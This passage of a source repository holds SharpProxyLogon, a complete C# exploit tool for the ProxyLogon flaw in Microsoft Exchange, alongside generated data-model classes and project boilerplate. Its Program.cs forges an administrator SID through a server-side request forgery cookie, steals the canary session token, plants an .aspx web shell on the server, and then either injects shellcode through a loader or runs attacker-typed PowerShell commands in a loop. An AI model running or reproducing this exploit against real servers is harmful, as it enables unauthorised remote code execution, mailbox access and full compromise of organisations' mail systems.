| { 584 | this.ecpUrltmEditingField = value; 585 | } 586 | } 587 | 588 | /// 589 | [System.Xml.Serialization.XmlElementAttribute("EcpUrl-extinstall")] 590 | public string EcpUrlextinstall 591 | { 592 | get 593 | { 594 | return this.ecpUrlextinstallField; 595 | } 596 | set 597 | { 598 | this.ecpUrlextinstallField = value; 599 | } 600 | } 601 | 602 | /// 603 | public string OOFUrl 604 | { 605 | get 606 | { 607 | return this.oOFUrlField; 608 | } 609 | set 610 | { 611 | this.oOFUrlField = value; 612 | } 613 | } 614 | 615 | /// 616 | public string UMUrl 617 | { 618 | get 619 | { 620 | return this.uMUrlField; 621 | } 622 | set 623 | { 624 | this.uMUrlField = value; 625 | } 626 | } 627 | 628 | /// 629 | public string OABUrl 630 | { 631 | get 632 | { 633 | return this.oABUrlField; 634 | } 635 | set 636 | { 637 | this.oABUrlField = value; 638 | } 639 | } 640 | 641 | /// 642 | public string ServerExclusiveConnect 643 | { 644 | get 645 | { 646 | return this.serverExclusiveConnectField; 647 | } 648 | set 649 | { 650 | this.serverExclusiveConnectField = value; 651 | } 652 | } 653 | 654 | /// 655 | public string CertPrincipalName 656 | { 657 | get 658 | { 659 | return this.certPrincipalNameField; 660 | } 661 | set 662 | { 663 | this.certPrincipalNameField = value; 664 | } 665 | } 666 | 667 | /// 668 | public string GroupingInformation 669 | { 670 | get 671 | { 672 | return this.groupingInformationField; 673 | } 674 | set 675 | { 676 | this.groupingInformationField = value; 677 | } 678 | } 679 | } 680 | 681 | /// 682 | [System.SerializableAttribute()] 683 | [System.ComponentModel.DesignerCategoryAttribute("code")] 684 | [System.Xml.Serialization.XmlTypeAttribute(AnonymousType = true, Namespace = "http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a")] 685 | public partial class ResponseAccountProtocolInternal 686 | { 687 | 688 | private ResponseAccountProtocolInternalOWAUrl oWAUrlField; 689 | 690 | private ResponseAccountProtocolInternalProtocol protocolField; 691 | 692 | /// 693 | public ResponseAccountProtocolInternalOWAUrl OWAUrl 694 | { 695 | get 696 | { 697 | return this.oWAUrlField; 698 | } 699 | set 700 | { 701 | this.oWAUrlField = value; 702 | } 703 | } 704 | 705 | /// 706 | public ResponseAccountProtocolInternalProtocol Protocol 707 | { 708 | get 709 | { 710 | return this.protocolField; 711 | } 712 | set 713 | { 714 | this.protocolField = value; 715 | } 716 | } 717 | } 718 | 719 | /// 720 | [System.SerializableAttribute()] 721 | [System.ComponentModel.DesignerCategoryAttribute("code")] 722 | [System.Xml.Serialization.XmlTypeAttribute(AnonymousType = true, Namespace = "http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a")] 723 | public partial class ResponseAccountProtocolInternalOWAUrl 724 | { 725 | 726 | private string authenticationMethodField; 727 | 728 | private string valueField; 729 | 730 | /// 731 | [System.Xml.Serialization.XmlAttributeAttribute()] 732 | public string AuthenticationMethod 733 | { 734 | get 735 | { 736 | return this.authenticationMethodField; 737 | } 738 | set 739 | { 740 | this.authenticationMethodField = value; 741 | } 742 | } 743 | 744 | /// 745 | [System.Xml.Serialization.XmlTextAttribute()] 746 | public string Value 747 | { 748 | get 749 | { 750 | return this.valueField; 751 | } 752 | set 753 | { 754 | this.valueField = value; 755 | } 756 | } 757 | } 758 | 759 | /// 760 | [System.SerializableAttribute()] 761 | [System.ComponentModel.DesignerCategoryAttribute("code")] 762 | [System.Xml.Serialization.XmlTypeAttribute(AnonymousType = true, Namespace = "http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a")] 763 | public partial class ResponseAccountProtocolInternalProtocol 764 | { 765 | 766 | private string typeField; 767 | 768 | private string aSUrlField; 769 | 770 | /// 771 | public string Type 772 | { 773 | get 774 | { 775 | return this.typeField; 776 | } 777 | set 778 | { 779 | this.typeField = value; 780 | } 781 | } 782 | 783 | /// 784 | public string ASUrl 785 | { 786 | get 787 | { 788 | return this.aSUrlField; 789 | } 790 | set 791 | { 792 | this.aSUrlField = value; 793 | } 794 | } 795 | } 796 | 797 | 798 | 799 | } 800 | -------------------------------------------------------------------------------- /SharpProxyLogon/Models/GetOABVirutalDirectory.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | 7 | namespace SharpProxyLogon.Models 8 | { 9 | 10 | 11 | public class GetOABVirutalDirectory 12 | { 13 | public D d { get; set; } 14 | } 15 | 16 | public class D 17 | { 18 | public string __type { get; set; } 19 | public string[] Cmdlets { get; set; } 20 | public object[] ErrorRecords { get; set; } 21 | public object[] Informations { get; set; } 22 | public bool IsDDIEnabled { get; set; } 23 | public object[] Warnings { get; set; } 24 | public object[] NoAccessProperties { get; set; } 25 | public Output[] Output { get; set; } 26 | public string[] ReadOnlyProperties { get; set; } 27 | 28 | } 29 | 30 | 31 | public class Server 32 | { 33 | public string __type { get; set; } 34 | public string Type { get; set; } 35 | } 36 | 37 | public class Internalurl 38 | { 39 | public string __type { get; set; } 40 | public string Type { get; set; } 41 | public string ExpectedUriKind { get; set; } 42 | } 43 | 44 | public class Externalurl 45 | { 46 | public string __type { get; set; } 47 | public string Type { get; set; } 48 | public string ExpectedUriKind { get; set; } 49 | } 50 | 51 | public class Pollinterval 52 | { 53 | public string __type { get; set; } 54 | public string Type { get; set; } 55 | public bool AcceptNull { get; set; } 56 | public bool AcceptUnlimted { get; set; } 57 | public int MaxValue { get; set; } 58 | public int MinValue { get; set; } 59 | } 60 | 61 | public class Name 62 | { 63 | public string __type { get; set; } 64 | public string Type { get; set; } 65 | public int MaxLength { get; set; } 66 | public int MinLength { get; set; } 67 | public string DisplayCharacters { get; set; } 68 | public string InvalidCharacters { get; set; } 69 | } 70 | 71 | public class Output 72 | { 73 | public Identity Identity { get; set; } 74 | 75 | } 76 | 77 | public class Identity 78 | { 79 | public string __type { get; set; } 80 | public string DisplayName { get; set; } 81 | public string RawIdentity { get; set; } 82 | } 83 | 84 | 85 | } 86 | -------------------------------------------------------------------------------- /SharpProxyLogon/Program.cs: -------------------------------------------------------------------------------- 1 | using Newtonsoft.Json; 2 | using SharpProxyLogon.Models; 3 | using System; 4 | using System.Collections.Generic; 5 | using System.IO; 6 | using System.Linq; 7 | using System.Net; 8 | using System.Net.Http; 9 | using System.Security.Authentication; 10 | using System.Text; 11 | using System.Threading; 12 | using System.Threading.Tasks; 13 | using System.Xml.Linq; 14 | 15 | namespace SharpProxyLogon 16 | { 17 | class Program 18 | { 19 | 20 | 21 | 22 | 23 | static async Task MainAsync(string[] args) 24 | { 25 | string ascii = @" 26 | __ _ ___ __ 27 | / _\ |__ __ _ _ __ _ __ / _ \_ __ _____ ___ _ / / ___ __ _ ___ _ __ 28 | \ \| '_ \ / _` | '__| '_ \ / /_)/ '__/ _ \ \/ / | | |/ / / _ \ / _` |/ _ \| '_ \ 29 | _\ \ | | | (_| | | | |_) / ___/| | | (_) > <| |_| / /__| (_) | (_| | (_) | | | | 30 | \__/_| |_|\__,_|_| | .__/\/ |_| \___/_/\_\\__, \____/\___/ \__, |\___/|_| |_| 31 | |_| |___/ |___/ 32 | @Flangvik 33 | "; 34 | 35 | Console.WriteLine(ascii); 36 | Console.WriteLine("Usage Shell: SharpProxyLogon.exe "); 37 | Console.WriteLine("Usage x64 injection: SharpProxyLogon.exe "); 38 | string shellcodePath = ""; 39 | string injectiontarget = ""; 40 | 41 | 42 | string shellcodeb64 = ""; 43 | string loaderb64 = TikiTorch.ShellcodeLoader; 44 | 45 | bool injection = false; 46 | 47 | if (args.Count() == 0) 48 | Environment.Exit(0); 49 | 50 | string targetServer = args[0]; 51 | string targetEmail = args[1]; 52 | 53 | if (args.Count() > 2) 54 | { 55 | shellcodePath = args[2]; 56 | injectiontarget = args[3]; 57 | 58 | injection = true; 59 | shellcodeb64 = Convert.ToBase64String(File.ReadAllBytes(shellcodePath)); 60 | 61 | } 62 | 63 | string randomShellName = Guid.NewGuid().ToString().Replace("-", ""); 64 | 65 | string shellPath = "C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\FrontEnd\\\\HttpProxy\\\\owa\\\\auth\\\\" + randomShellName + ".aspx"; 66 | 67 | var shell_content = @"".Replace("\"", @"\"""); 68 | 69 | if (injection) 70 | shell_content = @"".Replace("\"", @"\"""); 71 | 72 | var autoDiscoverBody = $@"{targetEmail} http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"; 73 | string hostname = ""; 74 | 75 | var proxy = new WebProxy 76 | { 77 | Address = new Uri($"http://127.0.0.1:8080"), 78 | BypassProxyOnLocal = false, 79 | UseDefaultCredentials = false, 80 | }; 81 | 82 | 83 | var httpClientHandler = new HttpClientHandler 84 | { 85 | //set UseProxy to True if u wanna debug 86 | Proxy = proxy, 87 | UseProxy = false, 88 | UseCookies = false, 89 | ServerCertificateCustomValidationCallback = (message, xcert, chain, errors) => 90 | { 91 | 92 | return true; 93 | }, 94 | SslProtocols = SslProtocols.Tls12 | SslProtocols.Tls11 | SslProtocols.Tls, 95 | }; 96 | 97 | using (var httpClientSSRF = new HttpClient(httpClientHandler)) 98 | { 99 | 100 | //Leak the internal hostname of target 101 | var leakFDQNReqMsg = new HttpRequestMessage(HttpMethod.Get, $"https://{targetServer}/ecp/{Guid.NewGuid().ToString().Replace("-", "")}.js"); 102 | 103 | leakFDQNReqMsg.Headers.Add("Cookie", "X-BEResource=localhost~1942062522"); 104 | 105 | var leakFQDNReqResp = await httpClientSSRF.SendAsync(leakFDQNReqMsg); 106 | 107 | leakFQDNReqResp.Headers.TryGetValues("X-FEServer", out var fqdnList); 108 | 109 | if (fqdnList.Count() == 0) 110 | { 111 | Console.WriteLine("[x] Failed to get FQDN"); 112 | Environment.Exit(0); 113 | } 114 | 115 | hostname = fqdnList.FirstOrDefault(); 116 | Console.WriteLine($"[+] Got hostname {hostname}"); 117 | //Autodisvery to get target mailboxid 118 | var autoDiscoverReqMsg = new HttpRequestMessage( 119 | HttpMethod.Post, 120 | $"https://{targetServer}/ecp/{randomShellName}.js" 121 | 122 | ); 123 | var autoDiscovercookieContainer = new CookieContainer(); 124 | 125 | autoDiscoverReqMsg.Headers.Add("Cookie", $"X-BEResource={hostname}/autodiscover/autodiscover.xml?a=~1942062522;"); 126 | autoDiscoverReqMsg.Content = new StringContent(autoDiscoverBody, Encoding.UTF8, "text/xml"); 127 | 128 | var autoDiscoverReqResp = await httpClientSSRF.SendAsync(autoDiscoverReqMsg); 129 | var autoDiscoverContentResp = await autoDiscoverReqResp.Content.ReadAsStringAsync(); 130 | 131 | var legacyDN = autoDiscoverContentResp.Split(new string[] { "" }, StringSplitOptions.None)[1].Split(new string[] { "" }, StringSplitOptions.None)[0]; 132 | var mailBoxId = autoDiscoverContentResp.Split(new string[] { "" }, StringSplitOptions.None)[1].Split(new string[] { "" }, StringSplitOptions.None)[0]; 133 | 134 | Console.WriteLine($"[+] Got legacyDN {legacyDN}"); 135 | Console.WriteLine($"[+] Got mailBoxId {mailBoxId}"); 136 | 137 | var mapiReqMsg = new HttpRequestMessage( 138 | HttpMethod.Post, 139 | $"https://{targetServer}/ecp/{Guid.NewGuid().ToString().Replace("-", "")}.js" 140 | 141 | ); 142 | var mapicookieContainer = new CookieContainer(); 143 | var mapiBody = legacyDN + "\x00\x00\x00\x00\x00\xe4\x04\x00\x00\x09\x04\x00\x00\x09\x04\x00\x00\x00\x00\x00\x00"; 144 | 145 | mapiReqMsg.Headers.Add("Cookie", $"X-BEResource=Administrator@{hostname}:444/mapi/emsmdb?MailboxId={mailBoxId}&a=~1942062522;"); 146 | mapiReqMsg.Headers.Add("X-Requesttype", "Connect"); 147 | mapiReqMsg.Headers.Add("X-Clientinfo", Guid.NewGuid().ToString()); 148 | mapiReqMsg.Headers.Add("X-Requestid", Guid.NewGuid().ToString()); 149 | mapiReqMsg.Headers.Add("X-Clientapplication", "Outlook/15.0.4815.1002"); 150 | 151 | mapiReqMsg.Content = new StringContent(mapiBody, null, "application/mapi-http"); 152 | mapiReqMsg.Content.Headers.ContentType.CharSet = null; 153 | 154 | var mapiReqResp = await httpClientSSRF.SendAsync(mapiReqMsg); 155 | var mapiContentResp = await mapiReqResp.Content.ReadAsStringAsync(); 156 | 157 | 158 | // with SID S-1-5-21-2354578447-2549489838-160590685-500 and MasterAccountSi 159 | var accountSID = mapiContentResp.Split(new string[] { "with SID " }, StringSplitOptions.None)[1].Split(new string[] { " and MasterAccountSi" }, StringSplitOptions.None)[0]; 160 | 161 | var adminSID = accountSID.Replace(accountSID.Split('-')[7], "500"); 162 | 163 | 164 | Console.WriteLine($"[+] Got accountSID {accountSID}"); 165 | Console.WriteLine($"[+] Patched accountSID-> {adminSID}"); 166 | 167 | //ProxyLogon to get Canary token 168 | var proxyLogonReqMsg = new HttpRequestMessage( 169 | HttpMethod.Post, 170 | $"https://{targetServer}/ecp/{Guid.NewGuid().ToString().Replace("-", "")}.js" 171 | 172 | ); 173 | var proxyLogoncookieContainer = new CookieContainer(); 174 | 175 | 176 | proxyLogonReqMsg.Headers.Add("Cookie", 177 | 178 | $"X-BEResource=Administrator@{hostname}:444/ecp/proxyLogon.ecp?a=~1942062522;" 179 | 180 | ); 181 | proxyLogonReqMsg.Headers.Add("msExchLogonAccount", adminSID); 182 | proxyLogonReqMsg.Headers.Add("msExchLogonMailbox", adminSID); 183 | proxyLogonReqMsg.Headers.Add("msExchTargetMailbox", adminSID); 184 | 185 | proxyLogonReqMsg.Headers.Add("X-Requesttype", "Connect"); 186 | proxyLogonReqMsg.Headers.Add("X-Clientinfo", Guid.NewGuid().ToString()); 187 | proxyLogonReqMsg.Headers.Add("X-Requestid", Guid.NewGuid().ToString()); 188 | proxyLogonReqMsg.Headers.Add("X-Clientapplication", "Outlook/15.0.4815.1002"); 189 | 190 | var proxyLogonBody = $@"{adminSID}"; 191 | 192 | proxyLogonReqMsg.Content = new StringContent(proxyLogonBody, Encoding.UTF8, "text/xml"); 193 | 194 | 195 | var proxyLogonReqResp = await httpClientSSRF.SendAsync(proxyLogonReqMsg); 196 | var proxyLogonContentResp = await proxyLogonReqResp.Content.ReadAsStringAsync(); 197 | 198 | proxyLogonReqResp.Headers.TryGetValues("Set-Cookie", out var responseCookies); 199 | 200 | 201 | var msExchEcpCanary = responseCookies.Where(x => x.StartsWith("msExchEcpCanary=")).FirstOrDefault().Split('=')[1].Split(';')[0]; 202 | var aspNETSessionID = responseCookies.Where(x => x.StartsWith("ASP.NET_SessionId")).FirstOrDefault().Split('=')[1].Split(';')[0]; 203 | 204 | Console.WriteLine($"[+] Got msExchEcpCanary {msExchEcpCanary}"); 205 | Console.WriteLine($"[+] Got aspNETSessionID {aspNETSessionID}"); 206 | 207 | 208 | var getOABIdReqMsg = new HttpRequestMessage( 209 | HttpMethod.Post, 210 | $"https://{targetServer}/ecp/{Guid.NewGuid().ToString().Replace("-", "")}.js" 211 | 212 | ); 213 | 214 | 215 | getOABIdReqMsg.Headers.Add("Cookie", 216 | 217 | $"X-BEResource=Administrator@{hostname}:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary={msExchEcpCanary}&a=~1942062522; ASP.NET_SessionId={aspNETSessionID}; msExchEcpCanary={msExchEcpCanary}" 218 | 219 | ); 220 | getOABIdReqMsg.Headers.Add("msExchLogonAccount", adminSID); 221 | getOABIdReqMsg.Headers.Add("msExchLogonMailbox", adminSID); 222 | getOABIdReqMsg.Headers.Add("msExchTargetMailbox", adminSID); 223 | 224 | getOABIdReqMsg.Headers.Add("X-Clientinfo", Guid.NewGuid().ToString()); 225 | getOABIdReqMsg.Headers.Add("X-Requestid", Guid.NewGuid().ToString()); 226 | getOABIdReqMsg.Headers.Add("X-Clientapplication", "Outlook/15.0.4815.1002"); 227 | 228 | var getOABIdBody = @" 229 | { 230 | ""filter"":{ 231 | ""Parameters"":{ 232 | ""__type"":""JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel"", 233 | ""SelectedView"":"""", 234 | ""SelectedVDirType"":""All"" 235 | } 236 | }, 237 | ""sort"":{ 238 | 239 | } 240 | } 241 | "; 242 | 243 | 244 | getOABIdReqMsg.Content = new StringContent(getOABIdBody, Encoding.UTF8, "application/json"); 245 | 246 | var getOABIdReqResp = await httpClientSSRF.SendAsync(getOABIdReqMsg); 247 | var getOABIdContentResp = await getOABIdReqResp.Content.ReadAsStringAsync(); 248 | 249 | 250 | var getOABIdJsonObject = JsonConvert.DeserializeObject(getOABIdContentResp); 251 | var OABId = getOABIdJsonObject.d.Output.FirstOrDefault().Identity.RawIdentity; 252 | 253 | Console.WriteLine($"[+] Got OABId {OABId}"); 254 | 255 | 256 | Console.WriteLine($"[+] Setting ExternalUrl..."); 257 | 258 | var setOABURLReqMsg = new HttpRequestMessage( 259 | HttpMethod.Post, 260 | $"https://{targetServer}/ecp/{Guid.NewGuid().ToString().Replace("-", "")}.js" 261 | 262 | ); 263 | 264 | 265 | setOABURLReqMsg.Headers.Add("Cookie", 266 | 267 | $"X-BEResource=Administrator@{hostname}:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary={msExchEcpCanary}&a=~1942062522; ASP.NET_SessionId={aspNETSessionID}; msExchEcpCanary={msExchEcpCanary}" 268 | 269 | ); 270 | setOABURLReqMsg.Headers.Add("msExchLogonAccount", adminSID); 271 | setOABURLReqMsg.Headers.Add("msExchLogonMailbox", adminSID); 272 | setOABURLReqMsg.Headers.Add("msExchTargetMailbox", adminSID); 273 | 274 | //setUNCPathReqMsg.Headers.Add("X-Requesttype", "Connect"); 275 | setOABURLReqMsg.Headers.Add("X-Clientinfo", Guid.NewGuid().ToString()); 276 | setOABURLReqMsg.Headers.Add("X-Requestid", Guid.NewGuid().ToString()); 277 | setOABURLReqMsg.Headers.Add("X-Clientapplication", "Outlook/15.0.4815.1002"); 278 | 279 | var setOABURLBody = @" 280 | { 281 | ""identity"":{ 282 | ""__type"":""Identity:ECP"", 283 | ""DisplayName"":""OAB (Default Web Site)"", 284 | ""RawIdentity"":""" + OABId + @""" 285 | }, 286 | ""properties"":{ 287 | ""Parameters"":{ 288 | ""__type"":""JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel"", 289 | ""ExternalUrl"":""http://a/#" + shell_content + @""" 290 | } 291 | } 292 | } "; 293 | 294 | 295 | setOABURLReqMsg.Content = new StringContent(setOABURLBody, Encoding.UTF8, "application/json"); 296 | 297 | var setOABURLReqResp = await httpClientSSRF.SendAsync(setOABURLReqMsg); 298 | var setOABURLContentResp = await setOABURLReqResp.Content.ReadAsStringAsync(); 299 | 300 | Console.WriteLine($"[+] Triggering ResetOABVirtualDirectory..."); 301 | //ProxyLogon to get Canary token 302 | var resetOABReqMsg = new HttpRequestMessage( 303 | HttpMethod.Post, 304 | $"https://{targetServer}/ecp/{Guid.NewGuid().ToString().Replace("-", "")}.js" 305 | 306 | ); 307 | 308 | 309 | resetOABReqMsg.Headers.Add("Cookie", 310 | 311 | $"X-BEResource=Administrator@{hostname}:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary={msExchEcpCanary}&a=~1942062522; ASP.NET_SessionId={aspNETSessionID}; msExchEcpCanary={msExchEcpCanary}" 312 | 313 | ); 314 | resetOABReqMsg.Headers.Add("msExchLogonAccount", adminSID); 315 | resetOABReqMsg.Headers.Add("msExchLogonMailbox", adminSID); 316 | resetOABReqMsg.Headers.Add("msExchTargetMailbox", adminSID); 317 | 318 | resetOABReqMsg.Headers.Add("X-Clientinfo", Guid.NewGuid().ToString()); 319 | resetOABReqMsg.Headers.Add("X-Requestid", Guid.NewGuid().ToString()); 320 | resetOABReqMsg.Headers.Add("X-Clientapplication", "Outlook/15.0.4815.1002"); 321 | 322 | var resetOABBody = @" 323 | { 324 | ""identity"":{ 325 | ""__type"":""Identity:ECP"", 326 | ""DisplayName"":""OAB (Default Web Site)"", 327 | ""RawIdentity"":""" + OABId + @""" 328 | }, 329 | ""properties"":{ 330 | ""Parameters"":{ 331 | ""__type"":""JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel"", 332 | ""FilePathName"":""" + shellPath + @""" 333 | } 334 | } 335 | } "; 336 | 337 | 338 | resetOABReqMsg.Content = new StringContent(resetOABBody, Encoding.UTF8, "application/json"); 339 | 340 | var resetOABReqResp = await httpClientSSRF.SendAsync(resetOABReqMsg); 341 | var resetOABContentResp = await resetOABReqResp.Content.ReadAsStringAsync(); 342 | Thread.Sleep(2000); 343 | if (injection) 344 | { 345 | Console.WriteLine($"[+] Shell should have landed, triggering injection"); 346 | //ProxyLogon to get Canary token 347 | var shellReqMsg = new HttpRequestMessage( 348 | HttpMethod.Post, 349 | $"https://{targetServer}/ecp/{randomShellName}.js"); 350 | 351 | //shellReqMsg.Headers.Add("Host", FQDN); 352 | shellReqMsg.Headers.Add("Cookie", 353 | 354 | $"X-BEResource=Administrator@{hostname}/owa/auth/{randomShellName}.aspx?a=~1942062522; ASP.NET_SessionId={aspNETSessionID}; msExchEcpCanary={msExchEcpCanary}" 355 | 356 | ); 357 | shellReqMsg.Headers.Add("msExchLogonAccount", adminSID); 358 | shellReqMsg.Headers.Add("msExchLogonMailbox", adminSID); 359 | shellReqMsg.Headers.Add("msExchTargetMailbox", adminSID); 360 | shellReqMsg.Headers.Add("X-Clientinfo", Guid.NewGuid().ToString()); 361 | shellReqMsg.Headers.Add("X-Requestid", Guid.NewGuid().ToString()); 362 | shellReqMsg.Headers.Add("X-Clientapplication", "Outlook/15.0.4815.1002"); 363 | 364 | 365 | var Parameters = new List> 366 | { 367 | new KeyValuePair("a", loaderb64), 368 | new KeyValuePair("b", Convert.ToBase64String(Encoding.UTF8.GetBytes(injectiontarget + "-" + shellcodeb64))) 369 | }; 370 | 371 | shellReqMsg.Content = new FormUrlEncodedContent(Parameters); 372 | 373 | var shellReqResp = await httpClientSSRF.SendAsync(shellReqMsg); 374 | var shellContentResp = await shellReqResp.Content.ReadAsStringAsync(); 375 | 376 | } 377 | else 378 | { 379 | Console.WriteLine($"[+] Shell should have landed, going semi-interactive"); 380 | 381 | while (true) 382 | { 383 | 384 | Console.Write("CMD #>"); 385 | var command = Console.ReadLine(); 386 | 387 | //ProxyLogon to get Canary token 388 | var shellReqMsg = new HttpRequestMessage( 389 | HttpMethod.Post, 390 | $"https://{targetServer}/ecp/{Guid.NewGuid().ToString().Replace("-", "")}.js"); 391 | 392 | //shellReqMsg.Headers.Add("Host", FQDN); 393 | shellReqMsg.Headers.Add("Cookie", 394 | 395 | $"X-BEResource=Administrator@{hostname}/owa/auth/{randomShellName}.aspx?a=~1942062522; ASP.NET_SessionId={aspNETSessionID}; msExchEcpCanary={msExchEcpCanary}" 396 | 397 | ); 398 | shellReqMsg.Headers.Add("msExchLogonAccount", adminSID); 399 | shellReqMsg.Headers.Add("msExchLogonMailbox", adminSID); 400 | shellReqMsg.Headers.Add("msExchTargetMailbox", adminSID); 401 | 402 | //setUNCPathReqMsg.Headers.Add("X-Requesttype", "Connect"); 403 | shellReqMsg.Headers.Add("X-Clientinfo", Guid.NewGuid().ToString()); 404 | shellReqMsg.Headers.Add("X-Requestid", Guid.NewGuid().ToString()); 405 | shellReqMsg.Headers.Add("X-Clientapplication", "Outlook/15.0.4815.1002"); 406 | 407 | var Parameters = new List> 408 | { 409 | new KeyValuePair("data", $@"Response.Write(new ActiveXObject(""WScript.Shell"").exec(""powershell.exe -command {command}"").stdout.readall());") 410 | }; 411 | 412 | shellReqMsg.Content = new FormUrlEncodedContent(Parameters); 413 | 414 | var shellReqResp = await httpClientSSRF.SendAsync(shellReqMsg); 415 | var shellContentResp = await shellReqResp.Content.ReadAsStringAsync(); 416 | 417 | Console.WriteLine(shellContentResp.Split(new string[] { "Name :" }, StringSplitOptions.None)[0]); 418 | } 419 | } 420 | } 421 | 422 | 423 | 424 | 425 | 426 | 427 | 428 | } 429 | 430 | static void Main(string[] args) 431 | { 432 | MainAsync(args).GetAwaiter().GetResult(); 433 | } 434 | } 435 | } 436 | -------------------------------------------------------------------------------- /SharpProxyLogon/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("SharpProxyLogon")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("SharpProxyLogon")] 13 | [assembly: AssemblyCopyright("Copyright © 2021")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("a84cb573-3030-4e3b-8381-b02246ebbf0a")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /SharpProxyLogon/SharpProxyLogon.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | Debug 7 | AnyCPU 8 | {A84CB573-3030-4E3B-8381-B02246EBBF0A} 9 | Exe 10 | SharpProxyLogon 11 | SharpProxyLogon 12 | v4.7.2 13 | 512 14 | true 15 | 16 | 17 | 18 | 19 | 20 | AnyCPU 21 | true 22 | full 23 | false 24 | bin\Debug\ 25 | DEBUG;TRACE 26 | prompt 27 | 4 28 | 29 | 30 | AnyCPU 31 | pdbonly 32 | true 33 | bin\Release\ 34 | TRACE 35 | prompt 36 | 4 37 | false 38 | 39 | 40 | 41 | 42 | true 43 | bin\x64\Debug\ 44 | DEBUG;TRACE 45 | full 46 | x64 47 | 7.3 48 | prompt 49 | true 50 | 51 | 52 | bin\x64\Release\ 53 | TRACE 54 | true 55 | pdbonly 56 | x64 57 | 7.3 58 | prompt 59 | true 60 | 61 | 62 | 63 | ..\packages\Costura.Fody.5.1.0\lib\netstandard1.0\Costura.dll 64 | 65 | 66 | ..\packages\Microsoft.Win32.Primitives.4.3.0\lib\net46\Microsoft.Win32.Primitives.dll 67 | True 68 | True 69 | 70 | 71 | ..\packages\Newtonsoft.Json.13.0.1\lib\net45\Newtonsoft.Json.dll 72 | 73 | 74 | 75 | ..\packages\System.AppContext.4.3.0\lib\net463\System.AppContext.dll 76 | True 77 | True 78 | 79 | 80 | 81 | ..\packages\System.Console.4.3.0\lib\net46\System.Console.dll 82 | True 83 | True 84 | 85 | 86 | 87 | ..\packages\System.Diagnostics.DiagnosticSource.4.3.0\lib\net46\System.Diagnostics.DiagnosticSource.dll 88 | 89 | 90 | ..\packages\System.Diagnostics.Tracing.4.3.0\lib\net462\System.Diagnostics.Tracing.dll 91 | True 92 | True 93 | 94 | 95 | ..\packages\System.Globalization.Calendars.4.3.0\lib\net46\System.Globalization.Calendars.dll 96 | True 97 | True 98 | 99 | 100 | ..\packages\System.IO.4.3.0\lib\net462\System.IO.dll 101 | True 102 | True 103 | 104 | 105 | ..\packages\System.IO.Compression.4.3.0\lib\net46\System.IO.Compression.dll 106 | True 107 | True 108 | 109 | 110 | 111 | ..\packages\System.IO.Compression.ZipFile.4.3.0\lib\net46\System.IO.Compression.ZipFile.dll 112 | True 113 | True 114 | 115 | 116 | ..\packages\System.IO.FileSystem.4.3.0\lib\net46\System.IO.FileSystem.dll 117 | True 118 | True 119 | 120 | 121 | ..\packages\System.IO.FileSystem.Primitives.4.3.0\lib\net46\System.IO.FileSystem.Primitives.dll 122 | True 123 | True 124 | 125 | 126 | ..\packages\System.Linq.4.3.0\lib\net463\System.Linq.dll 127 | True 128 | True 129 | 130 | 131 | ..\packages\System.Linq.Expressions.4.3.0\lib\net463\System.Linq.Expressions.dll 132 | True 133 | True 134 | 135 | 136 | ..\packages\System.Net.Http.4.3.0\lib\net46\System.Net.Http.dll 137 | True 138 | True 139 | 140 | 141 | ..\packages\System.Net.Sockets.4.3.0\lib\net46\System.Net.Sockets.dll 142 | True 143 | True 144 | 145 | 146 | 147 | ..\packages\System.Reflection.4.3.0\lib\net462\System.Reflection.dll 148 | True 149 | True 150 | 151 | 152 | ..\packages\System.Runtime.4.3.0\lib\net462\System.Runtime.dll 153 | True 154 | True 155 | 156 | 157 | ..\packages\System.Runtime.Extensions.4.3.0\lib\net462\System.Runtime.Extensions.dll 158 | True 159 | True 160 | 161 | 162 | ..\packages\System.Runtime.InteropServices.4.3.0\lib\net463\System.Runtime.InteropServices.dll 163 | True 164 | True 165 | 166 | 167 | ..\packages\System.Runtime.InteropServices.RuntimeInformation.4.3.0\lib\net45\System.Runtime.InteropServices.RuntimeInformation.dll 168 | True 169 | True 170 | 171 | 172 | ..\packages\System.Security.Cryptography.Algorithms.4.3.0\lib\net463\System.Security.Cryptography.Algorithms.dll 173 | True 174 | True 175 | 176 | 177 | ..\packages\System.Security.Cryptography.Encoding.4.3.0\lib\net46\System.Security.Cryptography.Encoding.dll 178 | True 179 | True 180 | 181 | 182 | ..\packages\System.Security.Cryptography.Primitives.4.3.0\lib\net46\System.Security.Cryptography.Primitives.dll 183 | True 184 | True 185 | 